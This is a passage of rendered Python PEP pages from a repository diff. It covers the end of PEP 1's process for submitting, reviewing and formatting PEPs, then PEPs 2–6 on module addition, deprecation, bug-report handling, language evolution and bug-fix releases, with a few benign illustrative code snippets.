Once the champion has asked the Python community as to whether an idea has any chance of acceptance, a draft PEP should be presented to the appropriate venue mentioned above. This gives the author a chance to flesh out the draft PEP to make it properly formatted, of high quality, and to address initial concerns about the proposal.

+
+
+

Submitting a PEP

+

Following the above initial discussion, the workflow varies based on whether any of the PEP’s co-authors are core developers. If one or more of the PEP’s co-authors are core developers, they are responsible for following the process outlined below. Otherwise (i.e. none of the co-authors are core developers), then the PEP author(s) will need to find a sponsor for the PEP.

Ideally, a core developer sponsor is identified, but non-core sponsors may also be selected with the approval of the Steering Council. Members of the GitHub “PEP editors” team and members of the Typing Council (PEP 729) are pre-approved to be sponsors. The sponsor’s job is to provide guidance to the PEP author to help them through the logistics of the PEP process (somewhat acting like a mentor). Being a sponsor does not disqualify that person from becoming a co-author or PEP-Delegate later on (but not both). The sponsor of a PEP is recorded in the “Sponsor:” field of the header.

Once the sponsor or the core developer(s) co-authoring the PEP deem the PEP ready for submission, the proposal should be submitted as a draft PEP via a GitHub pull request. The draft must be written in PEP style as described below, else it will fail review immediately (although minor errors may be corrected by the editors).

+

The standard PEP workflow is:

• You, the PEP author, fork the PEP repository, and create a file named pep-NNNN.rst that contains your new PEP. NNNN should be the next available PEP number not used by a published or in-PR PEP. (A sketch of the corresponding git commands appears after this list.)
• In the “PEP:” header field, enter the PEP number that matches your filename as your draft PEP number.
• In the “Type:” header field, enter “Standards Track”, “Informational”, or “Process” as appropriate, and for the “Status:” field enter “Draft”. For full details, see PEP Header Preamble.
• Update .github/CODEOWNERS such that any co-author(s) or sponsors with write access to the PEP repository are listed for your new file. This ensures any future pull requests changing the file will be assigned to them.
• Push this to your GitHub fork and submit a pull request.
• The PEP editors review your PR for structure, formatting, and other errors. For a reST-formatted PEP, PEP 12 is provided as a template. It also provides a complete introduction to reST markup that is used in PEPs. Approval criteria are:
  • It is sound and complete. The ideas must make technical sense. The editors do not consider whether they seem likely to be accepted.
  • The title accurately describes the content.
  • The PEP’s language (spelling, grammar, sentence structure, etc.) and code style (examples should match PEP 7 & PEP 8) should be correct and conformant. The PEP text will be automatically checked for correct reStructuredText formatting when the pull request is submitted. PEPs with invalid reST markup will not be approved.

  Editors are generally quite lenient about this initial review, expecting that problems will be corrected by the reviewing process. Note: Approval of the PEP is no guarantee that there are no embarrassing mistakes! Correctness is the responsibility of authors and reviewers, not the editors.

  If the PEP isn’t ready for approval, an editor will send it back to the author for revision, with specific instructions.
• Once approved, they will assign your PEP a number.
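As a minimal sketch of the git commands behind the fork-and-PR steps above (the username, branch name and PEP number 9999 are placeholders; the python/peps repository itself is real, but check the repository for its current file layout):

    # clone your fork of python/peps (username is a placeholder)
    git clone https://github.com/<your-username>/peps.git
    cd peps
    git checkout -b pep-9999          # work on a topic branch
    # ... create pep-9999.rst from the PEP 12 template ...
    git add pep-9999.rst
    git commit -m "Add draft PEP 9999"
    git push origin pep-9999          # then open a PR against python/peps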

Once the review process is complete, and the PEP editors approve it (note that this is not the same as accepting your PEP!), they will squash commit your pull request onto main.

The PEP editors will not unreasonably deny publication of a PEP. Reasons for denying PEP status include duplication of effort, being technically unsound, not providing proper motivation or addressing backwards compatibility, or not in keeping with the Python philosophy. The Steering Council can be consulted during the approval phase, and are the final arbiter of a draft’s PEP-ability.

Developers with write access to the PEP repository may claim PEP numbers directly by creating and committing a new PEP. When doing so, the developer must handle the tasks that would normally be taken care of by the PEP editors (see PEP Editor Responsibilities & Workflow). This includes ensuring the initial version meets the expected standards for submitting a PEP. Alternately, even developers should submit PEPs via pull request. When doing so, you are generally expected to handle the process yourself; if you need assistance from PEP editors, mention @python/pep-editors on GitHub.

As updates are necessary, the PEP author can check in new versions if they (or a collaborating developer) have write access to the PEP repository. Getting a PEP number assigned early can be useful for ease of reference, especially when multiple draft PEPs are being considered at the same time.

Standards Track PEPs consist of two parts, a design document and a reference implementation. It is generally recommended that at least a prototype implementation be co-developed with the PEP, as ideas that sound good in principle sometimes turn out to be impractical when subjected to the test of implementation.

+
+
+

Discussing a PEP

+

As soon as a PEP number has been assigned and the draft PEP is committed to the PEP repository, a discussion thread for the PEP should be created to provide a central place to discuss and review its contents, and the PEP should be updated so that the Discussions-To header links to it.

The PEP authors (or sponsor, if applicable) may select any reasonable venue for the discussion, so long as the following criteria are met:

• The forum is appropriate to the PEP’s topic.
• The thread is publicly available on the web so that all interested parties can participate.
• The discussion is subject to the Python Community Code of Conduct.
• A direct link to the current discussion thread is provided in the PEP under the Discussions-To header.

The PEPs category of the Python Discourse is the preferred choice for most new PEPs, whereas historically the Python-Dev mailing list was commonly used. Some specialized topics have specific venues, such as the Typing category and the Packaging category on the Python Discourse for typing and packaging PEPs, respectively. If the PEP authors are unsure of the best venue, the PEP Sponsor and PEP editors can advise them accordingly.

If a PEP undergoes a significant re-write or other major, substantive changes to its proposed specification, a new thread should typically be created in the chosen venue to solicit additional feedback. If this occurs, the Discussions-To link must be updated and a new Post-History entry added pointing to this new thread.

If the PEPs category is not chosen as the discussion venue, a brief announcement post should be made to the PEPs category with at least a link to the rendered PEP and the Discussions-To thread when the draft PEP is committed to the repository and if a major-enough change is made to trigger a new thread.

PEP authors are responsible for collecting community feedback on a PEP before submitting it for review. However, to avoid long-winded and open-ended discussions, strategies such as soliciting private or more narrowly-tailored feedback in the early design phase, collaborating with other community members with expertise in the PEP’s subject matter, and picking an appropriately-specialized discussion for the PEP’s topic (if applicable) should be considered. PEP authors should use their discretion here.

Once the PEP is assigned a number and committed to the PEP repository, substantive issues should generally be discussed on the canonical public thread, as opposed to private channels, GitHub pull request reviews or unrelated venues. This ensures everyone can follow and contribute, avoids fragmenting the discussion, and makes sure it is fully considered as part of the PEP review process. Comments, support, concerns and other feedback on this designated thread are a critical part of what the Steering Council or PEP-Delegate will consider when reviewing the PEP.

+
+
+

PEP Review & Resolution

+

Once the authors have completed a PEP, they may request a review for style and consistency from the PEP editors. However, content review and acceptance of the PEP is ultimately the responsibility of the Steering Council, which is formally initiated by opening a Steering Council issue once the authors (and sponsor, if any) determine the PEP is ready for final review and resolution.

To expedite the process in selected cases (e.g. when a change is clearly beneficial and ready to be accepted, but the PEP hasn’t been formally submitted for review yet), the Steering Council may also initiate a PEP review, first notifying the PEP author(s) and giving them a chance to make revisions.

The final authority for PEP approval is the Steering Council. However, whenever a new PEP is put forward, any core developer who believes they are suitably experienced to make the final decision on that PEP may offer to serve as its PEP-Delegate by notifying the Steering Council of their intent. If the Steering Council approves their offer, the PEP-Delegate will then have the authority to approve or reject that PEP. For PEPs related to the Python type system, the Typing Council (PEP 729) provides a recommendation to the Steering Council. To request such a recommendation, open an issue on the Typing Council issue tracker.

The term “PEP-Delegate” is used under the Steering Council governance model for the PEP’s designated decision maker, who is recorded in the “PEP-Delegate” field in the PEP’s header. The term “BDFL-Delegate” is a deprecated alias for PEP-Delegate, a legacy of the time when Python was led by a BDFL. Any legacy references to “BDFL-Delegate” should be treated as equivalent to “PEP-Delegate”.

An individual offering to nominate themselves as a PEP-Delegate must notify the relevant authors and (when present) the sponsor for the PEP, and submit their request to the Steering Council (which can be done via a new issue). Those taking on this responsibility are free to seek additional guidance from the Steering Council at any time, and are also expected to take the advice and perspectives of other core developers into account.

The Steering Council will generally approve such self-nominations by default, but may choose to decline them. Possible reasons for the Steering Council declining a self-nomination as PEP-Delegate include, but are not limited to, perceptions of a potential conflict of interest (e.g. working for the same organisation as the PEP submitter), or simply considering another potential PEP-Delegate to be more appropriate. If core developers (or other community members) have concerns regarding the suitability of a PEP-Delegate for any given PEP, they may ask the Steering Council to review the delegation.

If no volunteer steps forward, then the Steering Council will approach core developers (and potentially other Python community members) with relevant expertise, in an attempt to identify a candidate that is willing to serve as PEP-Delegate for that PEP. If no suitable candidate can be found, then the PEP will be marked as Deferred until one is available.

Previously appointed PEP-Delegates may choose to step down, or be asked to step down by the Council, in which case a new PEP-Delegate will be appointed in the same manner as for a new PEP (including deferral of the PEP if no suitable replacement can be found). In the event that a PEP-Delegate is asked to step down, this will overrule any prior acceptance or rejection of the PEP, and it will revert to Draft status.

When such standing delegations are put in place, the Steering Council will maintain sufficient public records to allow subsequent Councils, the core developers, and the wider Python community to understand the delegations that currently exist, why they were put in place, and the circumstances under which they may no longer be needed.

+

For a PEP to be accepted it must meet certain minimum criteria. It must be a clear and complete description of the proposed enhancement. The enhancement must represent a net improvement. The proposed implementation, if applicable, must be solid and must not complicate the interpreter unduly. Finally, a proposed enhancement must be “pythonic” in order to be accepted by the Steering Council. (However, “pythonic” is an imprecise term; it may be defined as whatever is acceptable to the Steering Council. This logic is intentionally circular.) See PEP 2 for standard library module acceptance criteria.

Except where otherwise approved by the Steering Council, pronouncements of PEP resolution will be posted to the PEPs category on the Python Discourse.

Once a PEP has been accepted, the reference implementation must be completed. When the reference implementation is complete and incorporated into the main source code repository, the status will be changed to “Final”.

+

To allow gathering of additional design and interface feedback before committing to long term stability for a language feature or standard library API, a PEP may also be marked as “Provisional”. This is short for “Provisionally Accepted”, and indicates that the proposal has been accepted for inclusion in the reference implementation, but additional user feedback is needed before the full design can be considered “Final”. Unlike regular accepted PEPs, provisionally accepted PEPs may still be Rejected or Withdrawn even after the related changes have been included in a Python release.

Wherever possible, it is considered preferable to reduce the scope of a proposal to avoid the need to rely on the “Provisional” status (e.g. by deferring some features to later PEPs), as this status can lead to version compatibility challenges in the wider Python ecosystem. PEP 411 provides additional details on potential use cases for the Provisional status.

A PEP can also be assigned the status “Deferred”. The PEP author or an editor can assign the PEP this status when no progress is being made on the PEP. Once a PEP is deferred, a PEP editor can reassign it to draft status.

A PEP can also be “Rejected”. Perhaps after all is said and done it was not a good idea. It is still important to have a record of this fact. The “Withdrawn” status is similar - it means that the PEP author themselves has decided that the PEP is actually a bad idea, or has accepted that a competing proposal is a better alternative.

When a PEP is Accepted, Rejected or Withdrawn, the PEP should be updated accordingly. In addition to updating the Status field, at the very least the Resolution header should be added with a direct link to the relevant post making a decision on the PEP.

PEPs can also be superseded by a different PEP, rendering the original obsolete. This is intended for Informational PEPs, where version 2 of an API can replace version 1.

The possible paths of the status of PEPs are as follows:

[PEP process flow diagram]

While not shown in the diagram, “Accepted” PEPs may technically move to “Rejected” or “Withdrawn” even after acceptance. This will only occur if the implementation process reveals fundamental flaws in the design that were not noticed prior to acceptance of the PEP. Unlike Provisional PEPs, these transitions are only permitted if the accepted proposal has not been included in a Python release - released changes must instead go through the regular deprecation process (which may require a new PEP providing the rationale for the deprecation).

+
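As a rough, simplified text summary of the transitions described above (the rendered diagram remains authoritative, and not every edge is listed):

    Draft       -> Accepted | Provisional | Deferred | Rejected | Withdrawn
    Accepted    -> Final
    Provisional -> Final (may still be Rejected/Withdrawn, even post-release)
    Deferred    -> Draft (when taken up again)
    Final       -> Superseded (when replaced by a succeeding PEP)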

Some Informational and Process PEPs may also have a status of “Active” if they are never meant to be completed. E.g. PEP 1 (this PEP).

+
+
+

PEP Maintenance

+

In general, PEPs are no longer substantially modified after they have reached the Accepted, Final, Rejected or Superseded state. Once resolution is reached, a PEP is considered a historical document rather than a living specification. Formal documentation of the expected behavior should be maintained elsewhere, such as the Language Reference for core features, the Library Reference for standard library modules or the PyPA Specifications for packaging.

If changes based on implementation experience and user feedback are made to Standards track PEPs while in the Provisional or (with SC approval) Accepted state, they should be noted in the PEP, such that the PEP accurately describes the implementation at the point where it is marked Final.

Active (Informational and Process) PEPs may be updated over time to reflect changes to development practices and other details. The precise process followed in these cases will depend on the nature and purpose of the PEP in question.

Occasionally, a Deferred or even a Withdrawn PEP may be resurrected with major updates, but it is often better to just propose a new one.

+
+
+
+

What belongs in a successful PEP?

+

Each PEP should have the following parts/sections:

1. Preamble – RFC 2822 style headers containing meta-data about the PEP, including the PEP number, a short descriptive title (limited to a maximum of 44 characters), the names, and optionally the contact info for each author, etc.

2. Abstract – a short (~200 word) description of the technical issue being addressed.

3. Motivation – The motivation is critical for PEPs that want to change the Python language, library, or ecosystem. It should clearly explain why the existing language specification is inadequate to address the problem that the PEP solves. This can include collecting documented support for the PEP from important projects in the Python ecosystem. PEP submissions without sufficient motivation may be rejected.

4. Rationale – The rationale fleshes out the specification by describing why particular design decisions were made. It should describe alternate designs that were considered and related work, e.g. how the feature is supported in other languages.

   The rationale should provide evidence of consensus within the community and discuss important objections or concerns raised during discussion.

5. Specification – The technical specification should describe the syntax and semantics of any new language feature. The specification should be detailed enough to allow competing, interoperable implementations for at least the current major Python platforms (CPython, Jython, IronPython, PyPy).

6. Backwards Compatibility – All PEPs that introduce backwards incompatibilities must include a section describing these incompatibilities and their severity. The PEP must explain how the author proposes to deal with these incompatibilities. PEP submissions without a sufficient backwards compatibility treatise may be rejected outright.

7. Security Implications – If there are security concerns in relation to the PEP, those concerns should be explicitly written out to make sure reviewers of the PEP are aware of them.

8. How to Teach This – For a PEP that adds new functionality or changes language behavior, it is helpful to include a section on how to teach users, new and experienced, how to apply the PEP to their work.

   This section may include key points and recommended documentation changes that would help users adopt a new feature or migrate their code to use a language change.

9. Reference Implementation – The reference implementation must be completed before any PEP is given status “Final”, but it need not be completed before the PEP is accepted. While there is merit to the approach of reaching consensus on the specification and rationale before writing code, the principle of “rough consensus and running code” is still useful when it comes to resolving many discussions of API details.

   The final implementation must include test code and documentation appropriate for either the Python language reference or the standard library reference.

10. Rejected Ideas – Throughout the discussion of a PEP, various ideas will be proposed which are not accepted. Those rejected ideas should be recorded along with the reasoning as to why they were rejected. This both helps record the thought process behind the final version of the PEP as well as preventing people from bringing up the same rejected idea again in subsequent discussions.

    In a way this section can be thought of as a breakout section of the Rationale section that is focused specifically on why certain ideas were not ultimately pursued.

11. Open Issues – While a PEP is in draft, ideas can come up which warrant further discussion. Those ideas should be recorded so people know that they are being thought about but do not have a concrete resolution. This helps make sure all issues required for the PEP to be ready for consideration are complete and reduces people duplicating prior discussion.

12. Footnotes – A collection of footnotes cited in the PEP, and a place to list non-inline hyperlink targets.

13. Copyright/license – Each new PEP must be placed under a dual license of public domain and CC0-1.0-Universal (see this PEP for an example).
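As an illustrative sketch of how these parts typically appear as reST section headers in a PEP body (the exact set of sections varies by proposal; see PEP 12 for the authoritative template):

    Abstract
    ========

    Motivation
    ==========

    Rationale
    =========

    Specification
    =============

    Backwards Compatibility
    =======================

    Security Implications
    =====================

    How to Teach This
    =================

    Reference Implementation
    ========================

    Rejected Ideas
    ==============

    Open Issues
    ===========

    Copyright
    =========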
+
+

PEP Formats and Templates

+

PEPs are UTF-8 encoded text files using the reStructuredText format. reStructuredText allows for rich markup that is still quite easy to read, but also results in good-looking and functional HTML. PEP 12 contains instructions and a PEP template.

The PEP text files are automatically converted to HTML (via a Sphinx-based build system) for easier online reading.

+
+
+

PEP Header Preamble

Each PEP must begin with an RFC 2822 style header preamble. The headers must appear in the following order. Headers marked with “*” are optional and are described below. All other headers are required.

  PEP: <pep number>
  Title: <pep title>
  Author: <list of authors' names and optionally, email addrs>
* Sponsor: <name of sponsor>
* PEP-Delegate: <PEP delegate's name>
  Discussions-To: <URL of current canonical discussion thread>
  Status: <Draft | Active | Accepted | Provisional | Deferred | Rejected |
           Withdrawn | Final | Superseded>
  Type: <Standards Track | Informational | Process>
* Topic: <Governance | Packaging | Release | Typing>
* Requires: <pep numbers>
  Created: <date created on, in dd-mmm-yyyy format>
* Python-Version: <version number>
  Post-History: <dates, in dd-mmm-yyyy format,
                 inline-linked to PEP discussion threads>
* Replaces: <pep number>
* Superseded-By: <pep number>
* Resolution: <date in dd-mmm-yyyy format, linked to the acceptance/rejection post>
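Because the preamble follows RFC 2822 conventions, the standard library’s email tooling can read it. The following is a minimal, illustrative sketch (the sample preamble and its values are hypothetical, and this is not part of the official PEP toolchain):

    from email.parser import HeaderParser

    # Hypothetical preamble text, for illustration only.
    PREAMBLE = """\
    PEP: 9999
    Title: An Example Proposal
    Author: Random J. User <random@example.com>
    Status: Draft
    Type: Process
    Created: 14-Aug-2001
    """

    # HeaderParser understands RFC 2822 style headers, including
    # continuation lines for multi-value fields.
    headers = HeaderParser().parsestr(PREAMBLE)
    print(headers["PEP"])     # 9999
    print(headers["Status"])  # Draft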

The Author header lists the names, and optionally the email addresses, of all the authors/owners of the PEP. The format of the Author header values must be:

Random J. User <random@example.com>

if the email address is included, and just:

Random J. User

if the address is not given. Most PEP authors use their real name, but if you prefer a different name and use it consistently in discussions related to the PEP, feel free to use it here.

If there are multiple authors, each should be on a separate line following RFC 2822 continuation line conventions. Note that personal email addresses in PEPs will be obscured as a defense against spam harvesters.

The Sponsor field records which developer (core, or otherwise approved by the Steering Council) is sponsoring the PEP. If one of the authors of the PEP is a core developer then no sponsor is necessary, and thus this field should be left out.

The PEP-Delegate field is used to record the individual appointed by the Steering Council to make the final decision to approve or reject a PEP.

Note: The Resolution header is required for Standards Track PEPs only. It contains a URL that should point to an email message or other web resource where the pronouncement about the PEP (i.e. its approval or rejection) is made.

The Discussions-To header provides the URL to the current canonical discussion thread for the PEP. For email lists, this should be a direct link to the thread in the list’s archives, rather than just a mailto: or hyperlink to the list itself.

The Type header specifies the type of PEP: Standards Track, Informational, or Process.

The optional Topic header lists the special topic, if any, the PEP belongs under. See the Topic Index for the existing topics.

The Created header records the date that the PEP was assigned a number, while Post-History is used to record the dates of and corresponding URLs to the Discussions-To threads for the PEP, with the former as the linked text, and the latter as the link target. Both sets of dates should be in dd-mmm-yyyy format, e.g. 14-Aug-2001.

Standards Track PEPs will typically have a Python-Version header which indicates the version of Python that the feature will be released with. Standards Track PEPs without a Python-Version header indicate interoperability standards that will initially be supported through external libraries and tools, and then potentially supplemented by a later PEP to add support to the standard library. Informational and Process PEPs do not need a Python-Version header.

PEPs may have a Requires header, indicating the PEP numbers that this PEP depends on.

PEPs may also have a Superseded-By header indicating that a PEP has been rendered obsolete by a later document; the value is the number of the PEP that replaces the current document. The newer PEP must have a Replaces header containing the number of the PEP that it rendered obsolete.
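As an aside (not part of the PEP’s text), the dd-mmm-yyyy form corresponds to the strftime pattern %d-%b-%Y:

    from datetime import date

    # Renders as "14-Aug-2001" under the C locale, matching the
    # format required by the Created and Post-History headers.
    print(date(2001, 8, 14).strftime("%d-%b-%Y"))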

Auxiliary Files

PEPs may include auxiliary files such as diagrams. Such files should be named pep-XXXX-Y.ext, where “XXXX” is the PEP number, “Y” is a serial number (starting at 1), and “ext” is replaced by the actual file extension (e.g. “png”).

Alternatively, all support files may be placed in a subdirectory called pep-XXXX, where “XXXX” is the PEP number. When using a subdirectory, there are no constraints on the names used in files.
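For illustration only (no such checker is mandated by this PEP), the naming scheme can be expressed as a regular expression:

    import re

    # "pep-XXXX-Y.ext": four-digit PEP number, serial number, extension.
    AUX_FILE = re.compile(r"^pep-(\d{4})-([1-9]\d*)\.(\w+)$")

    for name in ("pep-0001-1.png", "pep-0495-2.svg", "diagram.png"):
        print(name, "->", bool(AUX_FILE.match(name)))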

Changing Existing PEPs

Draft PEPs are freely open for discussion and proposed modification, at the discretion of the authors, until submitted to the Steering Council or PEP-Delegate for review and resolution. Substantive content changes should generally be first proposed on the PEP’s discussion thread listed in its Discussions-To header, while copyedits and corrections can be submitted as a GitHub issue or GitHub pull request. PEP authors with write access to the PEP repository can update the PEPs themselves by using git push or a GitHub PR to submit their changes. For guidance on modifying other PEPs, consult the PEP Maintenance section.

See the Contributing Guide for additional details, and when in doubt, please check first with the PEP author and/or a PEP editor.

Transferring PEP Ownership

It occasionally becomes necessary to transfer ownership of PEPs to a new champion. In general, it is preferable to retain the original author as a co-author of the transferred PEP, but that’s really up to the original author. A good reason to transfer ownership is that the original author no longer has the time or interest in updating it or following through with the PEP process, or has fallen off the face of the ’net (i.e. is unreachable or not responding to email). A bad reason to transfer ownership is that the author doesn’t agree with the direction of the PEP. One aim of the PEP process is to try to build consensus around a PEP, but if that’s not possible, an author can always submit a competing PEP.

If you are interested in assuming ownership of a PEP, you can also do this via pull request. Fork the PEP repository, make your ownership modification, and submit a pull request. You should mention both the original author and @python/pep-editors in a comment on the pull request. (If the original author’s GitHub username is unknown, use email.) If the original author doesn’t respond in a timely manner, the PEP editors will make a unilateral decision (it’s not like such decisions can’t be reversed :).

PEP Editor Responsibilities & Workflow

A PEP editor must be added to the @python/pep-editors group on GitHub and must watch the PEP repository.

Note that developers with write access to the PEP repository may handle the tasks that would normally be taken care of by the PEP editors. Alternately, even developers may request assistance from PEP editors by mentioning @python/pep-editors on GitHub.

For each new PEP that comes in, an editor does the following:

• Make sure that the PEP is either co-authored by a core developer, has a core developer as a sponsor, or has a sponsor specifically approved for this PEP by the Steering Council.
• Read the PEP to check if it is ready: sound and complete. The ideas must make technical sense, even if they don’t seem likely to be accepted.
• The title should accurately describe the content.
• The file name extension is correct (i.e. .rst).
• Ensure that everyone listed as a sponsor or co-author of the PEP who has write access to the PEP repository is added to .github/CODEOWNERS.
• Skim the PEP for obvious defects in language (spelling, grammar, sentence structure, etc.) and code style (examples should conform to PEP 7 & PEP 8). Editors may correct problems themselves, but are not required to do so (reStructuredText syntax is checked by the repo’s CI).
• If a project is portrayed as benefiting from or supporting the PEP, make sure there is some direct indication from the project included to make the support clear. This is to avoid a PEP accidentally portraying a project as supporting a PEP when in fact the support is based on conjecture.

If the PEP isn’t ready, an editor will send it back to the author for revision, with specific instructions. If reST formatting is a problem, ask the author(s) to use PEP 12 as a template and resubmit.

Once the PEP is ready for the repository, a PEP editor will:

• Check that the author has selected a valid PEP number, or assign them a number if they have not (almost always just the next available number, but sometimes it’s a special/joke number, like 666 or 3141). Remember that numbers below 100 are meta-PEPs.
• Check that the author has correctly labeled the PEP’s type (“Standards Track”, “Informational”, or “Process”), and marked its status as “Draft”.
• Ensure all CI build and lint checks pass without errors, and there are no obvious issues in the rendered preview output.
• Merge the new (or updated) PEP.
• Inform the author of the next steps (open a discussion thread and update the PEP with it, post an announcement, etc.).

Updates to existing PEPs should be submitted as a GitHub pull request.

Many PEPs are written and maintained by developers with write access to the Python codebase. The PEP editors monitor the PEP repository for changes, and correct any structure, grammar, spelling, or markup mistakes they see.

PEP editors don’t pass judgment on PEPs. They merely do the administrative & editorial part (which is generally a low volume task).

Source: https://github.com/python/peps/blob/main/peps/pep-0001.rst

Last modified: 2024-10-17 13:14:44 GMT

diff --git a/pep-0002/index.html b/pep-0002/index.html

PEP 2 – Procedure for Adding New Modules

Author: Brett Cannon <brett at python.org>, Martijn Faassen <faassen at infrae.com>
Status: Active
Type: Process
Created: 07-Jul-2001
Post-History: 07-Jul-2001, 09-Mar-2002

Introduction

The Python Standard Library contributes significantly to Python’s success. The language comes with “batteries included”, so it is easy for people to become productive with just the standard library alone. It is therefore important that the usefulness of the standard library be maintained.

Due to the visibility and importance of the standard library, it must be maintained thoughtfully. As such, any code within it must be maintained by Python’s development team, which leads to a perpetual cost for each addition made. There is also the added cognitive load for users of familiarizing themselves with what is in the standard library.

New functionality is commonly added to the library in the form of new modules. This PEP describes the procedure for the addition of new modules. PEP 4 deals with procedures for deprecation of modules: the removal of old and unused modules from the standard library.

Acceptance Procedure

For top-level modules/packages, a PEP is required. The procedure for writing a PEP is covered in PEP 1.

For submodules of a preexisting package in the standard library, additions are at the discretion of the general Python development team and its members.

General guidance on what modules typically are accepted into the standard library, the overall process, etc. is covered in the developer’s guide.

Maintenance Procedure

Anything accepted into the standard library is expected to be primarily maintained there, within Python’s development infrastructure. While some members of the development team may choose to maintain a backport of a module outside of the standard library, it is up to them to keep their external code in sync as appropriate.

Source: https://github.com/python/peps/blob/main/peps/pep-0002.rst

Last modified: 2023-09-09 17:39:29 GMT

diff --git a/pep-0003/index.html b/pep-0003/index.html

PEP 3 – Guidelines for Handling Bug Reports

Author: Jeremy Hylton <jeremy at alum.mit.edu>
Status: Withdrawn
Type: Process
Created: 25-Sep-2000
Post-History:

Important

This PEP has been withdrawn.

This PEP contained guidelines for handling bug reports in the Python bug tracker. It has been replaced by the Developer’s Guide description of issue triaging. Guidelines for people submitting Python bugs are in the Python docs.

Original Guidelines

1. Make sure the bug category and bug group are correct. If they are correct, it is easier for someone interested in helping to find out, say, what all the open Tkinter bugs are.
2. If it’s a minor feature request that you don’t plan to address right away, add it to PEP 42 or ask the owner to add it for you. If you add the bug to PEP 42, mark the bug as “feature request”, “later”, and “closed”; and add a comment to the bug saying that this is the case (mentioning the PEP explicitly).

   XXX do we prefer the tracker or PEP 42?

3. Assign the bug a reasonable priority. We don’t yet have a clear sense of what each priority should mean. One rule, however, is that bugs with priority “urgent” or higher must be fixed before the next release.
4. If a bug report doesn’t have enough information to allow you to reproduce or diagnose it, ask the original submitter for more information. If the original report is really thin and your email doesn’t get a response after a reasonable waiting period, you can close the bug.
5. If you fix a bug, mark the status as “Fixed” and close it. In the comments, include the SVN revision numbers of the commit(s). In the SVN checkin message, include the issue number and a normal description of the change, mentioning the contributor if a patch was applied.
6. If you are assigned a bug that you are unable to deal with, assign it to someone else if you think they will be able to deal with it; otherwise it’s probably best to unassign it.


Source: https://github.com/python/peps/blob/main/peps/pep-0003.rst

Last modified: 2024-04-14 20:08:31 GMT

diff --git a/pep-0004/index.html b/pep-0004/index.html

PEP 4 – Deprecation of Standard Modules

Author: Brett Cannon <brett at python.org>, Martin von Löwis <martin at v.loewis.de>
Status: Active
Type: Process
Created: 01-Oct-2000
Post-History:

Introduction

When new modules were added to the standard Python library in the past, it was not possible to foresee whether they would still be useful in the future. Even though Python “Comes With Batteries Included”, batteries may discharge over time. Carrying old modules around is a burden on the maintainer, especially when there is no interest in the module anymore.

At the same time, removing a module from the distribution is difficult, as it is not known in general whether anybody is still using it. This PEP defines a procedure for removing modules from the standard Python library. Usage of a module may be ‘deprecated’, which means that it may be removed from a future Python release.

Procedure for declaring a module deprecated

To remove a top-level module/package from the standard library, a PEP is required. The deprecation process is outlined in PEP 387.

For removing a submodule of a package in the standard library, PEP 387 must be followed, but a PEP is not required.
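As a present-day illustration (PEP 387, not this PEP, defines the actual policy), a deprecated module conventionally warns its users on import along these lines:

    import warnings

    # Hypothetical module-level deprecation notice; the module name
    # "spam" is made up for this sketch.
    warnings.warn(
        "the spam module is deprecated and slated for removal "
        "in a future Python release",
        DeprecationWarning,
        stacklevel=2,
    )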

Source: https://github.com/python/peps/blob/main/peps/pep-0004.rst

Last modified: 2023-09-09 17:39:29 GMT

diff --git a/pep-0005/index.html b/pep-0005/index.html

PEP 5 – Guidelines for Language Evolution

Author: Paul Prescod <paul at prescod.net>
Status: Superseded
Type: Process
Created: 26-Oct-2000
Post-History:
Superseded-By: 387

Abstract

In the natural evolution of programming languages it is sometimes necessary to make changes that modify the behavior of older programs. This PEP proposes a policy for implementing these changes in a manner respectful of the installed base of Python users.

Implementation Details

Implementation of this PEP requires the addition of a formal warning and deprecation facility that will be described in another proposal.

Scope

These guidelines apply to future versions of Python that introduce backward-incompatible behavior. Backward-incompatible behavior is a major deviation in Python interpretation from an earlier behavior described in the standard Python documentation. Removal of a feature also constitutes a change of behavior.

This PEP does not replace or preclude other compatibility strategies such as dynamic loading of backwards-compatible parsers. On the other hand, if execution of “old code” requires a special switch or pragma then that is indeed a change of behavior from the point of view of the user, and that change should be implemented according to these guidelines.

In general, common sense must prevail in the implementation of these guidelines. For instance, changing “sys.copyright” does not constitute a backwards-incompatible change of behavior!

Steps For Introducing Backwards-Incompatible Features

1. Propose backwards-incompatible behavior in a PEP. The PEP must include a section on backwards compatibility that describes in detail a plan to complete the remainder of these steps.
2. Once the PEP is accepted as a productive direction, implement an alternate way to accomplish the task previously provided by the feature that is being removed or changed. For instance, if the addition operator were scheduled for removal, a new version of Python could implement an “add()” built-in function.
3. Formally deprecate the obsolete construct in the Python documentation.
4. Add an optional warning mode to the parser that will inform users when the deprecated construct is used. In other words, all programs that will behave differently in the future must trigger warnings in this mode. Compile-time warnings are preferable to runtime warnings. The warning messages should steer people from the deprecated construct to the alternative construct. (A present-day illustration follows this list.)
5. There must be at least a one-year transition period between the release of the transitional version of Python and the release of the backwards-incompatible version. Users will have at least a year to test their programs and migrate them from use of the deprecated construct to the alternative one.
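The warning mode described in step 4 survives today in the warnings machinery; as an illustrative aside, users can surface such transition warnings during testing like this:

    import warnings

    # Escalate DeprecationWarnings to errors so that code relying on
    # deprecated constructs fails loudly during the transition period.
    warnings.simplefilter("error", DeprecationWarning)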

Source: https://github.com/python/peps/blob/main/peps/pep-0005.rst

Last modified: 2023-11-28 14:46:07 GMT

diff --git a/pep-0006/index.html b/pep-0006/index.html

PEP 6 – Bug Fix Releases

Author: Aahz <aahz at pythoncraft.com>, Anthony Baxter <anthony at interlink.com.au>
Status: Superseded
Type: Process
Created: 15-Mar-2001
Post-History: 15-Mar-2001, 18-Apr-2001, 19-Aug-2004

Note

This PEP is obsolete. The current release policy is documented in the devguide. See also PEP 101 for mechanics of the release process.

Abstract

Python has historically had only a single fork of development, with releases having the combined purpose of adding new features and delivering bug fixes (these kinds of releases will be referred to as “major releases”). This PEP describes how to fork off maintenance, or bug fix, releases of old versions for the primary purpose of fixing bugs.

This PEP is not, repeat NOT, a guarantee of the existence of bug fix releases; it only specifies a procedure to be followed if bug fix releases are desired by enough of the Python community willing to do the work.

Motivation

With the move to SourceForge, Python development has accelerated. There is a sentiment among part of the community that there was too much acceleration, and many people are uncomfortable with upgrading to new versions to get bug fixes when so many features have been added, sometimes late in the development cycle.

One solution for this issue is to maintain the previous major release, providing bug fixes until the next major release. This should make Python more attractive for enterprise development, where Python may need to be installed on hundreds or thousands of machines.

Prohibitions

Bug fix releases are required to adhere to the following restrictions:

1. There must be zero syntax changes. All .pyc and .pyo files must work (no regeneration needed) with all bugfix releases forked off from a major release.
2. There must be zero pickle changes.
3. There must be no incompatible C API changes. All extensions must continue to work without recompiling in all bugfix releases in the same fork as a major release.

Breaking any of these prohibitions requires a BDFL proclamation (and a prominent warning in the release notes).

Not-Quite-Prohibitions

